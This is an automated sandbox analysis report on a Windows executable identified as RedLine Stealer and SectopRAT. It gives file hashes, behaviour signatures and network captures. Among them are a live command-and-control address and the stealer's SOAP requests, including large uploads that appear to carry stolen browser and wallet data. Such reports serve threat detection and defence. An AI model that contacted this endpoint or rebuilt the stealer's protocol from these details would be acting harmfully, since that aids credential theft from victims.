Analysis
-
max time kernel
28s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
25/05/2023, 15:56 UTC
General
-
Target
2c5a75b7d24847bc5d206adb5c630a18.exe
-
Size
95KB
-
MD5
2c5a75b7d24847bc5d206adb5c630a18
-
SHA1
89ca4d98947ab1248c022d66a23279f04cca6bbf
-
SHA256
dd09828ffbfdd784f83cac83641b8a0c3ca04b76becabb0ab5d170ad1bc169a7
-
SHA512
2ff1ad476ea1c72f6e1cda33f601e2eae06ca87bf4554cd085e17512a88ad515e95d42706e8e0a2c2b1fe17c9e0f1c511ef1554333d17a7e6e111b1531acc789
-
SSDEEP
1536:Fqs8haqpalbG6jejoigIP43Ywzi0Zb78ivombfexv0ujXyyed2YtmulgS6pQl:DiaKaYP+zi0ZbYe1g0ujyzdsQ
Malware Config
Extracted
redline
crypto
163.123.142.235:61068
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2c5a75b7d24847bc5d206adb5c630a18.exe"C:\Users\Admin\AppData\Local\Temp\2c5a75b7d24847bc5d206adb5c630a18.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
-
POSThttp://163.123.142.235:61068/Remote address:163.123.142.235:61068RequestPOST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 163.123.142.235:61068
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:08 GMT
-
POSThttp://163.123.142.235:61068/Remote address:163.123.142.235:61068RequestPOST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 163.123.142.235:61068
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:14 GMT
-
POSThttp://163.123.142.235:61068/Remote address:163.123.142.235:61068RequestPOST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 163.123.142.235:61068
Content-Length: 1597997
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:27 GMT
-
POSThttp://163.123.142.235:61068/Remote address:163.123.142.235:61068RequestPOST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 163.123.142.235:61068
Content-Length: 1597989
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 25 May 2023 15:56:29 GMT
-
DNSapi.ip.sbRemote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A104.26.12.31api.ip.sb.cdn.cloudflare.netIN A104.26.13.31api.ip.sb.cdn.cloudflare.netIN A172.67.75.172
-
GEThttps://api.ip.sb/geoipRemote address:104.26.12.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 25 May 2023 15:56:21 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 354
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fcuvanY58K51nZUe9avuRJw2Dg6U4k5zpPGOsChL4a7%2FYWm7C7T1b8OUnFI9FIM3Y%2FTFwCKbHiampNWrkzJtI7QhVJGbHTAO%2BIW5yX9qYxJF1wn6HuMA8Iywkg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 7ccef7caab12286b-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
163.123.142.235:61068http://163.123.142.235:61068/http
HTTP Request
POST http://163.123.142.235:61068/HTTP Response
200HTTP Request
POST http://163.123.142.235:61068/HTTP Response
200HTTP Request
POST http://163.123.142.235:61068/HTTP Response
200HTTP Request
POST http://163.123.142.235:61068/HTTP Response
200 -
104.26.12.31:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200
-
8.8.8.8:53api.ip.sbdns
DNS Request
api.ip.sb
DNS Response
104.26.12.31104.26.13.31172.67.75.172
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
92KB
MD5747ae56c4c143d35c9f4deb890d470c3
SHA11bbe23d6c5eeb56f8a3ea5459bbd00cb825dc22a
SHA256e847489244a60ca420a700898a700fc01002a84aed20b1af9d4ffde6b0a3214e
SHA512f492b8d634c02d680e906f3827b53b41d69905ad59eda7c419f1f8af33a795f6330d1d88243eeab0365a1f25cf524070231ce4720034a4d0cf85a8acf5b05395
-
Filesize
120KB
-
Filesize
256KB
-
Filesize
256KB